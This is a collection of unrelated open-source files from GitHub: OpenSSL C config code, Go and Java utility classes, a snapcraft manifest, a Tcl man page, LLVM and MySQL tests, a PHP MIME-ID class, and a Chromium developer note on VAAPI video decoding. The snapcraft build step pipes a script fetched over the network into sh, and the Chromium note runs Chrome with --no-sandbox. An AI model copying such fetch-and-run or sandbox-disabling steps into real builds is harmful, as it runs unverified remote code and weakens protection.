protected])" * The word 'cryptographic' can be left out if the rouines from the library * being used are not cryptographic related :-). * 4. If you include any Windows specific code (or a derivative thereof) from * the apps directory (application code) you must include an acknowledgement: * "This product includes software written by Tim Hudson ([email protected])" * * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * The licence and distribution terms for any publically available version or * derivative of this code cannot be changed. i.e. this code cannot simply be * copied and put under another distribution licence * [including the GNU Public Licence.] */ /* Part of the code in here was originally in conf.c, which is now removed */ #ifndef CONF_DEBUG # undef NDEBUG /* avoid conflicting definitions */ # define NDEBUG #endif #include <assert.h> #include <stdlib.h> #include <string.h> #include <openssl/conf.h> #include <openssl/conf_api.h> #include "e_os.h" static void value_free_hash_doall_arg(CONF_VALUE *a, LHASH_OF(CONF_VALUE) *conf); static void value_free_stack_doall(CONF_VALUE *a); static IMPLEMENT_LHASH_DOALL_ARG_FN(value_free_hash, CONF_VALUE, LHASH_OF(CONF_VALUE)) static IMPLEMENT_LHASH_DOALL_FN(value_free_stack, CONF_VALUE) /* Up until OpenSSL 0.9.5a, this was get_section */ CONF_VALUE *_CONF_get_section(const CONF *conf, const char *section) { CONF_VALUE *v, vv; if ((conf == NULL) || (section == NULL)) return (NULL); vv.name = NULL; vv.section = (char *)section; v = lh_CONF_VALUE_retrieve(conf->data, &vv); return (v); } /* Up until OpenSSL 0.9.5a, this was CONF_get_section */ STACK_OF(CONF_VALUE) *_CONF_get_section_values(const CONF *conf, const char *section) { CONF_VALUE *v; v = _CONF_get_section(conf, section); if (v != NULL) return ((STACK_OF(CONF_VALUE) *)v->value); else return (NULL); } int _CONF_add_string(CONF *conf, CONF_VALUE *section, CONF_VALUE *value) { CONF_VALUE *v = NULL; STACK_OF(CONF_VALUE) *ts; ts = (STACK_OF(CONF_VALUE) *)section->value; value->section = section->section; if (!sk_CONF_VALUE_push(ts, value)) { return 0; } v = lh_CONF_VALUE_insert(conf->data, value); if (v != NULL) { (void)sk_CONF_VALUE_delete_ptr(ts, v); OPENSSL_free(v->name); OPENSSL_free(v->value); OPENSSL_free(v); } return 1; } char *_CONF_get_string(const CONF *conf, const char *section, const char *name) { CONF_VALUE *v, vv; char *p; if (name == NULL) return (NULL); if (conf != NULL) { if (section != NULL) { vv.name = (char *)name; vv.section = (char *)section; v = lh_CONF_VALUE_retrieve(conf->data, &vv); if (v != NULL) return (v->value); if (strcmp(section, "ENV") == 0) { p = getenv(name); if (p != NULL) return (p); } } vv.section = "default"; vv.name = (char *)name; v = lh_CONF_VALUE_retrieve(conf->data, &vv); if (v != NULL) return (v->value); else return (NULL); } else return (getenv(name)); } #if 0 /* There's no way to provide error checking * with this function, so force implementors * of the higher levels to get a string and * read the number themselves. */ long _CONF_get_number(CONF *conf, char *section, char *name) { char *str; long ret = 0; str = _CONF_get_string(conf, section, name); if (str == NULL) return (0); for (;;) { if (conf->meth->is_number(conf, *str)) ret = ret * 10 + conf->meth->to_int(conf, *str); else return (ret); str++; } } #endif static unsigned long conf_value_hash(const CONF_VALUE *v) { return (lh_strhash(v->section) << 2) ^ lh_strhash(v->name); } static IMPLEMENT_LHASH_HASH_FN(conf_value, CONF_VALUE) static int conf_value_cmp(const CONF_VALUE *a, const CONF_VALUE *b) { int i; if (a->section != b->section) { i = strcmp(a->section, b->section); if (i) return (i); } if ((a->name != NULL) && (b->name != NULL)) { i = strcmp(a->name, b->name); return (i); } else if (a->name == b->name) return (0); else return ((a->name == NULL) ? -1 : 1); } static IMPLEMENT_LHASH_COMP_FN(conf_value, CONF_VALUE) int _CONF_new_data(CONF *conf) { if (conf == NULL) { return 0; } if (conf->data == NULL) if ((conf->data = lh_CONF_VALUE_new()) == NULL) { return 0; } return 1; } void _CONF_free_data(CONF *conf) { if (conf == NULL || conf->data == NULL) return; lh_CONF_VALUE_down_load(conf->data) = 0; /* evil thing to make * sure the * 'OPENSSL_free()' works as * * expected */ lh_CONF_VALUE_doall_arg(conf->data, LHASH_DOALL_ARG_FN(value_free_hash), LHASH_OF(CONF_VALUE), conf->data); /* * We now have only 'section' entries in the hash table. Due to problems * with */ lh_CONF_VALUE_doall(conf->data, LHASH_DOALL_FN(value_free_stack)); lh_CONF_VALUE_free(conf->data); } static void value_free_hash_doall_arg(CONF_VALUE *a, LHASH_OF(CONF_VALUE) *conf) { if (a->name != NULL) (void)lh_CONF_VALUE_delete(conf, a); } static void value_free_stack_doall(CONF_VALUE *a) { CONF_VALUE *vv; STACK_OF(CONF_VALUE) *sk; int i; if (a->name != NULL) return; sk = (STACK_OF(CONF_VALUE) *)a->value; for (i = sk_CONF_VALUE_num(sk) - 1; i >= 0; i--) { vv = sk_CONF_VALUE_value(sk, i); OPENSSL_free(vv->value); OPENSSL_free(vv->name); OPENSSL_free(vv); } if (sk != NULL) sk_CONF_VALUE_free(sk); OPENSSL_free(a->section); OPENSSL_free(a); } /* Up until OpenSSL 0.9.5a, this was new_section */ CONF_VALUE *_CONF_new_section(CONF *conf, const char *section) { STACK_OF(CONF_VALUE) *sk = NULL; int ok = 0, i; CONF_VALUE *v = NULL, *vv; if ((sk = sk_CONF_VALUE_new_null()) == NULL) goto err; if ((v = OPENSSL_malloc(sizeof(CONF_VALUE))) == NULL) goto err; i = strlen(section) + 1; if ((v->section = OPENSSL_malloc(i)) == NULL) goto err; memcpy(v->section, section, i); v->name = NULL; v->value = (char *)sk; vv = lh_CONF_VALUE_insert(conf->data, v); OPENSSL_assert(vv == NULL); ok = 1; err: if (!ok) { if (sk != NULL) sk_CONF_VALUE_free(sk); if (v != NULL) OPENSSL_free(v); v = NULL; } return (v); } IMPLEMENT_STACK_OF(CONF_VALUE)
{ "pile_set_name": "Github" }
/* Package to provides helpers to ease working with pointer values of marshalled structures. */ package to // Copyright 2017 Microsoft Corporation // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // String returns a string value for the passed string pointer. It returns the empty string if the // pointer is nil. func String(s *string) string { if s != nil { return *s } return "" } // StringPtr returns a pointer to the passed string. func StringPtr(s string) *string { return &s } // StringSlice returns a string slice value for the passed string slice pointer. It returns a nil // slice if the pointer is nil. func StringSlice(s *[]string) []string { if s != nil { return *s } return nil } // StringSlicePtr returns a pointer to the passed string slice. func StringSlicePtr(s []string) *[]string { return &s } // StringMap returns a map of strings built from the map of string pointers. The empty string is // used for nil pointers. func StringMap(msp map[string]*string) map[string]string { ms := make(map[string]string, len(msp)) for k, sp := range msp { if sp != nil { ms[k] = *sp } else { ms[k] = "" } } return ms } // StringMapPtr returns a pointer to a map of string pointers built from the passed map of strings. func StringMapPtr(ms map[string]string) *map[string]*string { msp := make(map[string]*string, len(ms)) for k, s := range ms { msp[k] = StringPtr(s) } return &msp } // Bool returns a bool value for the passed bool pointer. It returns false if the pointer is nil. func Bool(b *bool) bool { if b != nil { return *b } return false } // BoolPtr returns a pointer to the passed bool. func BoolPtr(b bool) *bool { return &b } // Int returns an int value for the passed int pointer. It returns 0 if the pointer is nil. func Int(i *int) int { if i != nil { return *i } return 0 } // IntPtr returns a pointer to the passed int. func IntPtr(i int) *int { return &i } // Int32 returns an int value for the passed int pointer. It returns 0 if the pointer is nil. func Int32(i *int32) int32 { if i != nil { return *i } return 0 } // Int32Ptr returns a pointer to the passed int32. func Int32Ptr(i int32) *int32 { return &i } // Int64 returns an int value for the passed int pointer. It returns 0 if the pointer is nil. func Int64(i *int64) int64 { if i != nil { return *i } return 0 } // Int64Ptr returns a pointer to the passed int64. func Int64Ptr(i int64) *int64 { return &i } // Float32 returns an int value for the passed int pointer. It returns 0.0 if the pointer is nil. func Float32(i *float32) float32 { if i != nil { return *i } return 0.0 } // Float32Ptr returns a pointer to the passed float32. func Float32Ptr(i float32) *float32 { return &i } // Float64 returns an int value for the passed int pointer. It returns 0.0 if the pointer is nil. func Float64(i *float64) float64 { if i != nil { return *i } return 0.0 } // Float64Ptr returns a pointer to the passed float64. func Float64Ptr(i float64) *float64 { return &i }
{ "pile_set_name": "Github" }
name: deadd-notification-center confinement: strict base: core18 summary: Linux Notification Center adopt-info: deadd-notification-center description: | A haskell-written notification center for users that like a desktop with style... slots: dbus-daemon: interface: dbus bus: session name: org.freedesktop.Notifications apps: deadd-notification-center: command: usr/bin/deadd-notification-center extensions: [gnome-3-28] slots: - dbus-daemon parts: deadd-notification-center: plugin: make source: https://github.com/phuhl/linux_notification_center.git build-packages: - libcairo2-dev - libpango1.0-dev - libgirepository1.0-dev - libgtk-3-dev - libxml2-dev stage-packages: - curl build-environment: - PATH: "/root/.local/bin/$PATH" override-build: | mkdir -p /root/parts/deadd-notification-center/install/usr/share/locale/en/LC_MESSAGES mkdir -p /root/parts/deadd-notification-center/install/usr/share/locale/de/LC_MESSAGES curl -SSL https://get.haskellstack.org | sh -s - -f which stack snapcraftctl build override-pull: | snapcraftctl pull version="$(git describe --always --tags | sed -e 's/-/+git/;y/-/./')" [ -n "$(echo $version | grep "+git")" ] && grade=devel || grade=stable snapcraftctl set-version "$version" snapcraftctl set-grade "$grade" echo "Version: ${version}" echo "Grade: ${grade}"
{ "pile_set_name": "Github" }
/* * (c) Copyright IBM Corp 2002, 2006 */ package javax.xml.namespace; import java.io.*; /** * <code>QName</code> class represents the value of a qualified name * as specified in <a href="http://www.w3.org/TR/xmlschema-2/#QName">XML * Schema Part2: Datatypes specification</a>. * <p> * The value of a QName contains a <b>namespaceURI</b> and a <b>localPart</b>. * The localPart provides the local part of the qualified name. The * namespaceURI is a URI reference identifying the namespace. * * Note: Some of this impl code was taken from Axis. * * @author axis-dev * @author Matthew J. Duftler ([email protected]) */ public class QName implements Serializable { // Comment/shared empty string. private static final String emptyString = ""; // Field namespaceURI. private String namespaceURI; // Field localPart. private String localPart; // Field prefix. private String prefix; private static final long serialVersionUID = -9120448754896609940L; /** * Constructor for the QName. * * @param localPart Local part of the QName */ public QName(String localPart) { this.namespaceURI = emptyString; this.localPart = (localPart == null) ? emptyString : localPart.intern(); this.prefix = emptyString; } /** * Constructor for the QName. * * @param namespaceURI Namespace URI for the QName * @param localPart Local part of the QName. */ public QName(String namespaceURI, String localPart) { this.namespaceURI = (namespaceURI == null) ? emptyString : namespaceURI.intern(); this.localPart = (localPart == null) ? emptyString : localPart.intern(); this.prefix = emptyString; } /** * Constructor for the QName. * * @param namespaceURI Namespace URI for the QName * @param localPart Local part of the QName. * @param prefix the xmlns-declared prefix for this namespaceURI */ public QName(String namespaceURI, String localPart, String prefix) { this.namespaceURI = (namespaceURI == null) ? emptyString : namespaceURI.intern(); this.localPart = (localPart == null) ? emptyString : localPart.intern(); this.prefix = (prefix == null) ? emptyString : prefix.intern(); } /** * Gets the Namespace URI for this QName * * @return Namespace URI */ public String getNamespaceURI() { return namespaceURI; } /** * Gets the Local part for this QName * * @return Local part */ public String getLocalPart() { return localPart; } /** * Gets the prefix for this QName * * @return prefix of this QName */ public String getPrefix() { return prefix; } /** * Returns a string representation of this QName * * @return a string representation of the QName */ public String toString() { return ((namespaceURI == emptyString) ? localPart : '{' + namespaceURI + '}' + localPart); } /** * Tests this QName for equality with another object. * <p> * If the given object is not a QName or is null then this method * returns <tt>false</tt>. * <p> * For two QNames to be considered equal requires that both * localPart and namespaceURI must be equal. This method uses * <code>String.equals</code> to check equality of localPart * and namespaceURI. Any class that extends QName is required * to satisfy this equality contract. * <p> * This method satisfies the general contract of the <code>Object.equals</code> method. * * @param obj the reference object with which to compare * * @return <code>true</code> if the given object is identical to this * QName: <code>false</code> otherwise. */ public final boolean equals(Object obj) { if (obj == this) { return true; } if (!(obj instanceof QName)) { return false; } if ((namespaceURI == ((QName)obj).namespaceURI) && (localPart == ((QName)obj).localPart)) { return true; } return false; } /** * Returns a QName holding the value of the specified String. * <p> * The string must be in the form returned by the QName.toString() * method, i.e. "{namespaceURI}localPart", with the "{namespaceURI}" * part being optional. * <p> * This method doesn't do a full validation of the resulting QName. * In particular, it doesn't check that the resulting namespace URI * is a legal URI (per RFC 2396 and RFC 2732), nor that the resulting * local part is a legal NCName per the XML Namespaces specification. * * @param s the string to be parsed * @throws java.lang.IllegalArgumentException If the specified String * cannot be parsed as a QName * @return QName corresponding to the given String */ public static QName valueOf(String s) { if ((s == null) || s.equals("")) { throw new IllegalArgumentException("Invalid QName literal."); } if (s.charAt(0) == '{') { int i = s.indexOf('}'); if (i == -1) { throw new IllegalArgumentException("Invalid QName literal."); } if (i == s.length() - 1) { throw new IllegalArgumentException("Invalid QName literal."); } else { return new QName(s.substring(1, i), s.substring(i + 1)); } } else { return new QName(s); } } /** * Returns a hash code value for this QName object. The hash code * is based on both the localPart and namespaceURI parts of the * QName. This method satisfies the general contract of the * <code>Object.hashCode</code> method. * * @return a hash code value for this Qname object */ public final int hashCode() { return namespaceURI.hashCode() ^ localPart.hashCode(); } private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException { in.defaultReadObject(); namespaceURI = namespaceURI.intern(); localPart = localPart.intern(); if(prefix == null) { //The serialized object did not have a 'prefix'. //i.e. it was serialized from an old version of QName. prefix = emptyString; } else { prefix = prefix.intern(); } } }
{ "pile_set_name": "Github" }
/** * This file has no copyright assigned and is placed in the Public Domain. * This file is part of the mingw-w64 runtime package. * No warranty is given; refer to the file DISCLAIMER.PD within this package. */ long double fabsl (long double x); long double fabsl (long double x) { #if defined(__x86_64__) || defined(_AMD64_) || defined(__i386__) || defined(_X86_) long double res = 0.0L; asm volatile ("fabs;" : "=t" (res) : "0" (x)); return res; #elif defined(__arm__) || defined(_ARM_) || defined(__aarch64__) || defined(_ARM64_) return __builtin_fabsl (x); #endif /* defined(__x86_64__) || defined(_AMD64_) || defined(__i386__) || defined(_X86_) */ }
{ "pile_set_name": "Github" }
/* * 公共 */ .share { padding: 20rpx 10rpx; } .share .title { border-left: 3px solid #ff6a80; margin-left: 10rpx; padding-left: 20rpx; font-size: 32rpx; font-weight: 500; } .share .desc { font-size: 32rpx; padding: 0 10rpx 20rpx 10rpx; margin-top: 20rpx; } .share .content { padding: 20rpx; } .share .submit { margin: 20rpx 0; padding: 0 20rpx; } .share button { height: 70rpx; line-height: 70rpx; } .submit-double button { width: 48%; } /* * 链接 */ .url .content { font-size: 32rpx; color: #ff6a80; }
{ "pile_set_name": "Github" }
'\" '\" Copyright (c) 2005 Andreas Kupries <[email protected]> '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" .TH Tcl_SetChannelError 3 8.5 Tcl "Tcl Library Procedures" .so man.macros .BS '\" Note: do not modify the .SH NAME line immediately below! .SH NAME Tcl_SetChannelError, Tcl_SetChannelErrorInterp, Tcl_GetChannelError, Tcl_GetChannelErrorInterp \- functions to create/intercept Tcl errors by channel drivers. .SH SYNOPSIS .nf \fB#include <tcl.h>\fR .sp void \fBTcl_SetChannelError\fR(\fIchan, msg\fR) .sp void \fBTcl_SetChannelErrorInterp\fR(\fIinterp, msg\fR) .sp void \fBTcl_GetChannelError\fR(\fIchan, msgPtr\fR) .sp void \fBTcl_GetChannelErrorInterp\fR(\fIinterp, msgPtr\fR) .sp .SH ARGUMENTS .AS Tcl_Channel chan .AP Tcl_Channel chan in Refers to the Tcl channel whose bypass area is accessed. .AP Tcl_Interp* interp in Refers to the Tcl interpreter whose bypass area is accessed. .AP Tcl_Obj* msg in Error message put into a bypass area. A list of return options and values, followed by a string message. Both message and the option/value information are optional. .AP Tcl_Obj** msgPtr out Reference to a place where the message stored in the accessed bypass area can be stored in. .BE .SH DESCRIPTION .PP The current definition of a Tcl channel driver does not permit the direct return of arbitrary error messages, except for the setting and retrieval of channel options. All other functions are restricted to POSIX error codes. .PP The functions described here overcome this limitation. Channel drivers are allowed to use \fBTcl_SetChannelError\fR and \fBTcl_SetChannelErrorInterp\fR to place arbitrary error messages in \fBbypass areas\fR defined for channels and interpreters. And the generic I/O layer uses \fBTcl_GetChannelError\fR and \fBTcl_GetChannelErrorInterp\fR to look for messages in the bypass areas and arrange for their return as errors. The POSIX error codes set by a driver are used now if and only if no messages are present. .PP \fBTcl_SetChannelError\fR stores error information in the bypass area of the specified channel. The number of references to the \fBmsg\fR value goes up by one. Previously stored information will be discarded, by releasing the reference held by the channel. The channel reference must not be NULL. .PP \fBTcl_SetChannelErrorInterp\fR stores error information in the bypass area of the specified interpreter. The number of references to the \fBmsg\fR value goes up by one. Previously stored information will be discarded, by releasing the reference held by the interpreter. The interpreter reference must not be NULL. .PP \fBTcl_GetChannelError\fR places either the error message held in the bypass area of the specified channel into \fImsgPtr\fR, or NULL; and resets the bypass, that is, after an invocation all following invocations will return NULL, until an intervening invocation of \fBTcl_SetChannelError\fR with a non-NULL message. The \fImsgPtr\fR must not be NULL. The reference count of the message is not touched. The reference previously held by the channel is now held by the caller of the function and it is its responsibility to release that reference when it is done with the value. .PP \fBTcl_GetChannelErrorInterp\fR places either the error message held in the bypass area of the specified interpreter into \fImsgPtr\fR, or NULL; and resets the bypass, that is, after an invocation all following invocations will return NULL, until an intervening invocation of \fBTcl_SetChannelErrorInterp\fR with a non-NULL message. The \fImsgPtr\fR must not be NULL. The reference count of the message is not touched. The reference previously held by the interpreter is now held by the caller of the function and it is its responsibility to release that reference when it is done with the value. .PP Which functions of a channel driver are allowed to use which bypass function is listed below, as is which functions of the public channel API may leave a messages in the bypass areas. .IP \fBTcl_DriverCloseProc\fR May use \fBTcl_SetChannelErrorInterp\fR, and only this function. .IP \fBTcl_DriverInputProc\fR May use \fBTcl_SetChannelError\fR, and only this function. .IP \fBTcl_DriverOutputProc\fR May use \fBTcl_SetChannelError\fR, and only this function. .IP \fBTcl_DriverSeekProc\fR May use \fBTcl_SetChannelError\fR, and only this function. .IP \fBTcl_DriverWideSeekProc\fR May use \fBTcl_SetChannelError\fR, and only this function. .IP \fBTcl_DriverSetOptionProc\fR Has already the ability to pass arbitrary error messages. Must \fInot\fR use any of the new functions. .IP \fBTcl_DriverGetOptionProc\fR Has already the ability to pass arbitrary error messages. Must \fInot\fR use any of the new functions. .IP \fBTcl_DriverWatchProc\fR Must \fInot\fR use any of the new functions. Is internally called and has no ability to return any type of error whatsoever. .IP \fBTcl_DriverBlockModeProc\fR May use \fBTcl_SetChannelError\fR, and only this function. .IP \fBTcl_DriverGetHandleProc\fR Must \fInot\fR use any of the new functions. It is only a low-level function, and not used by Tcl commands. .IP \fBTcl_DriverHandlerProc\fR Must \fInot\fR use any of the new functions. Is internally called and has no ability to return any type of error whatsoever. .PP Given the information above the following public functions of the Tcl C API are affected by these changes; when these functions are called, the channel may now contain a stored arbitrary error message requiring processing by the caller. .DS .ta 1.9i 4i \fBTcl_Flush\fR \fBTcl_GetsObj\fR \fBTcl_Gets\fR \fBTcl_ReadChars\fR \fBTcl_ReadRaw\fR \fBTcl_Read\fR \fBTcl_Seek\fR \fBTcl_StackChannel\fR \fBTcl_Tell\fR \fBTcl_WriteChars\fR \fBTcl_WriteObj\fR \fBTcl_WriteRaw\fR \fBTcl_Write\fR .DE .PP All other API functions are unchanged. In particular, the functions below leave all their error information in the interpreter result. .DS .ta 1.9i 4i \fBTcl_Close\fR \fBTcl_UnstackChannel\fR \fBTcl_UnregisterChannel\fR .DE .SH "SEE ALSO" Tcl_Close(3), Tcl_OpenFileChannel(3), Tcl_SetErrno(3) .SH KEYWORDS channel driver, error messages, channel type
{ "pile_set_name": "Github" }
// RUN: llvm-mc -triple=i686-pc-windows -filetype=obj -o %t %s // RUN: llvm-objdump -d -r %t | FileCheck %s .globl _main _main: // CHECK: 00 00 00 00 // CHECK-NEXT: 00000002: IMAGE_REL_I386_DIR32 .rdata movb L_alias1(%eax), %al // CHECK: 01 00 00 00 // CHECK-NEXT: 00000008: IMAGE_REL_I386_DIR32 .rdata movb L_alias2(%eax), %al retl .section .rdata,"dr" L_sym1: .ascii "\001" L_sym2: .ascii "\002" L_alias1 = L_sym1 L_alias2 = L_sym2
{ "pile_set_name": "Github" }
<?php /** * Copyright 2014-2017 Horde LLC (http://www.horde.org/) * * See the enclosed file COPYING for license information (LGPL). If you * did not receive this file, see http://www.horde.org/licenses/lgpl21. * * @category Horde * @copyright 2014-2017 Horde LLC * @license http://www.horde.org/licenses/lgpl21 LGPL 2.1 * @package Mime */ /** * Provides methods to manipulate/query MIME IDs. * * @author Michael Slusarz <[email protected]> * @category Horde * @copyright 2014-2017 Horde LLC * @license http://www.horde.org/licenses/lgpl21 LGPL 2.1 * @package Mime * @since 2.5.0 */ class Horde_Mime_Id { /* Constants for idArithmetic() method. */ const ID_DOWN = 1; const ID_NEXT = 2; const ID_PREV = 3; const ID_UP = 4; /** * MIME ID. * * @var string */ public $id; /** * Constructor. * * @param string $id MIME ID. */ public function __construct($id) { $this->id = $id; } /** */ public function __toString() { return $this->id; } /** * Performs MIME ID "arithmetic". * * @param string $action One of: * - ID_DOWN: ID of child. Note: ID_DOWN will first traverse to "$id.0" * if given an ID *NOT* of the form "$id.0". If given an ID of * the form "$id.0", ID_DOWN will traverse to "$id.1". This * behavior can be avoided if 'no_rfc822' option is set. * - ID_NEXT: ID of next sibling. * - ID_PREV: ID of previous sibling. * - ID_UP: ID of parent. Note: ID_UP will first traverse to "$id.0" if * given an ID *NOT* of the form "$id.0". If given an ID of the * form "$id.0", ID_UP will traverse to "$id". This behavior can * be avoided if 'no_rfc822' option is set. * @param array $options Additional options: * - count: (integer) How many levels to traverse. * DEFAULT: 1 * - no_rfc822: (boolean) Don't traverse RFC 822 sub-levels. * DEFAULT: false * * @return mixed The resulting ID string, or null if that ID can not * exist. */ public function idArithmetic($action, array $options = array()) { return $this->_idArithmetic($this->id, $action, array_merge(array( 'count' => 1 ), $options)); } /** * @see idArithmetic() */ protected function _idArithmetic($id, $action, $options) { $pos = strrpos($id, '.'); $end = ($pos === false) ? $id : substr($id, $pos + 1); switch ($action) { case self::ID_DOWN: if ($end == '0') { $id = ($pos === false) ? 1 : substr_replace($id, '1', $pos + 1); } else { $id .= empty($options['no_rfc822']) ? '.0' : '.1'; } break; case self::ID_NEXT: ++$end; $id = ($pos === false) ? $end : substr_replace($id, $end, $pos + 1); break; case self::ID_PREV: if (($end == '0') || (empty($options['no_rfc822']) && ($end == '1'))) { $id = null; } elseif ($pos === false) { $id = --$end; } else { $id = substr_replace($id, --$end, $pos + 1); } break; case self::ID_UP: if ($pos === false) { $id = ($end == '0') ? null : '0'; } elseif (!empty($options['no_rfc822']) || ($end == '0')) { $id = substr($id, 0, $pos); } else { $id = substr_replace($id, '0', $pos + 1); } break; } return (!is_null($id) && --$options['count']) ? $this->_idArithmetic($id, $action, $options) : $id; } /** * Determines if a given MIME ID lives underneath a base ID. * * @param string $id The MIME ID to query. * * @return boolean Whether $id lives under the base ID ($this->id). */ public function isChild($id) { $base = (substr($this->id, -2) == '.0') ? substr($this->id, 0, -1) : rtrim($this->id, '.') . '.'; return ((($base == 0) && ($id != 0)) || (strpos(strval($id), strval($base)) === 0)); } }
{ "pile_set_name": "Github" }
# Enabling hardware <video> decode codepaths on linux Hardware acceleration of video decode on Linux is [unsupported](https://crbug.com/137247) in Chrome for user-facing builds. During development (targeting other platforms) it can be useful to be able to trigger the code-paths used on HW-accelerated platforms (such as CrOS and win7) in a linux-based development environment. Here's one way to do so, with details based on a gprecise setup. * Install pre-requisites: On Ubuntu Precise, at least, this includes: ```shell sudo apt-get install libtool libvdpau1 libvdpau-dev ``` * Install and configure [libva](http://cgit.freedesktop.org/libva/) ```shell DEST=${HOME}/apps/libva cd /tmp git clone git://anongit.freedesktop.org/libva cd libva git reset --hard libva-1.2.1 ./autogen.sh && ./configure --prefix=${DEST} make -j32 && make install ``` * Install and configure the [VDPAU](http://cgit.freedesktop.org/vaapi/vdpau-driver) VAAPI driver ```shell DEST=${HOME}/apps/libva cd /tmp git clone git://anongit.freedesktop.org/vaapi/vdpau-driver cd vdpau-driver export PKG_CONFIG_PATH=${DEST}/lib/pkgconfig/:$PKG_CONFIG_PATH export LIBVA_DRIVERS_PATH=${DEST}/lib/dri export LIBVA_X11_DEPS_CFLAGS=-I${DEST}/include export LIBVA_X11_DEPS_LIBS=-L${DEST}/lib export LIBVA_DEPS_CFLAGS=-I${DEST}/include export LIBVA_DEPS_LIBS=-L${DEST}/lib make distclean unset CC CXX ./autogen.sh && ./configure --prefix=${DEST} --enable-debug find . -name Makefile |xargs sed -i 'sI/usr/lib/xorg/modules/driversI${DEST}/lib/driIg' sed -i -e 's/_(\(VAEncH264VUIBufferType\|VAEncH264SEIBufferType\));//' src/vdpau_dump.c make -j32 && rm -f ${DEST}/lib/dri/{nvidia_drv_video.so,s3g_drv_video.so} && make install ``` * Add to args.gn: * `target_os = "chromeos"` to link in `VaapiVideoDecodeAccelerator` * `proprietary_codecs = true` and `ffmpeg_branding = "Chrome"` to allow Chrome to play h.264 content, which is the only codec VAVDA knows about today. * Rebuild chrome * Run chrome with `LD_LIBRARY_PATH=${HOME}/apps/libva/lib` in the environment, and with the `--no-sandbox` command line flag. * If things don't work, a Debug build (to include D\*LOG's) with `--vmodule=*content/common/gpu/media/*=10,gpu_video*=1` might be enlightening. ** note NOTE THIS IS AN UNSUPPORTED CONFIGURATION AND LIKELY TO BE BROKEN AT ANY POINT IN TIME ** This page is purely here to help developers targeting supported HW `<video>` decode platforms be more effective. Do not expect help if this setup fails to work.
{ "pile_set_name": "Github" }
# Author: Horst Hunger # Created: 2010-07-06 --source include/not_embedded.inc --source include/have_partition.inc let $engine_table= MYISAM; let $engine_part= MYISAM; let $engine_subpart= MYISAM; CREATE USER test2@localhost; --disable_result_log --disable_query_log --source suite/parts/inc/part_exch_tabs.inc --enable_result_log --enable_query_log GRANT USAGE ON *.* TO test2@localhost; GRANT CREATE, DROP, ALTER, UPDATE, INSERT, SELECT ON test.* TO test2@localhost; --echo connect (test2,localhost,test2,,test,MASTER_MYPORT,MASTER_MYSOCK); connect (test2,localhost,test2,,test,$MASTER_MYPORT,$MASTER_MYSOCK); USE test; SHOW GRANTS FOR CURRENT_USER; # 9) Exchanges with different owner. # Privilege for ALTER and SELECT ALTER TABLE tp EXCHANGE PARTITION p0 WITH TABLE t_10; --sorted_result SELECT * FROM t_10; --sorted_result SELECT * FROM tp WHERE a BETWEEN 0 AND 10; # Back to former values. ALTER TABLE tp EXCHANGE PARTITION p0 WITH TABLE t_10; --sorted_result SELECT * FROM t_10; --sorted_result SELECT * FROM tp WHERE a BETWEEN 0 AND 10; ALTER TABLE tsp EXCHANGE PARTITION sp00 WITH TABLE tsp_00; --sorted_result SELECT * FROM tsp_00; --sorted_result SELECT * FROM tsp WHERE a BETWEEN 0 AND 10; # Back to former values. ALTER TABLE tsp EXCHANGE PARTITION sp00 WITH TABLE tsp_00; --sorted_result SELECT * FROM tsp_00; --sorted_result SELECT * FROM tsp WHERE a BETWEEN 0 AND 10; --echo disconnect test2; disconnect test2; --echo connection default; connection default; REVOKE INSERT ON test.* FROM test2@localhost; --echo connect (test2,localhost,test2,,test,MASTER_MYPORT,MASTER_MYSOCK); connect (test2,localhost,test2,,test,$MASTER_MYPORT,$MASTER_MYSOCK); USE test; SHOW GRANTS FOR CURRENT_USER; # Privilege for ALTER and SELECT --error ER_TABLEACCESS_DENIED_ERROR ALTER TABLE tp EXCHANGE PARTITION p0 WITH TABLE t_10; --echo disconnect test2; disconnect test2; --echo connection default; connection default; GRANT INSERT ON test.* TO test2@localhost; REVOKE CREATE ON test.* FROM test2@localhost; --echo connect (test2,localhost,test2,,test,MASTER_MYPORT,MASTER_MYSOCK); connect (test2,localhost,test2,,test,$MASTER_MYPORT,$MASTER_MYSOCK); USE test; SHOW GRANTS FOR CURRENT_USER; --error ER_TABLEACCESS_DENIED_ERROR ALTER TABLE tsp EXCHANGE PARTITION sp00 WITH TABLE tsp_00; --echo disconnect test2; disconnect test2; --echo connection default; connection default; GRANT CREATE ON test.* TO test2@localhost; REVOKE DROP ON test.* FROM test2@localhost; --echo connect (test2,localhost,test2,,test,MASTER_MYPORT,MASTER_MYSOCK); connect (test2,localhost,test2,,test,$MASTER_MYPORT,$MASTER_MYSOCK); USE test; SHOW GRANTS FOR CURRENT_USER; # Privilege for ALTER and SELECT --error ER_TABLEACCESS_DENIED_ERROR ALTER TABLE tp EXCHANGE PARTITION p0 WITH TABLE t_10; --echo disconnect test2; disconnect test2; --echo connection default; connection default; --source suite/parts/inc/part_exch_drop_tabs.inc DROP USER test2@localhost;
{ "pile_set_name": "Github" }
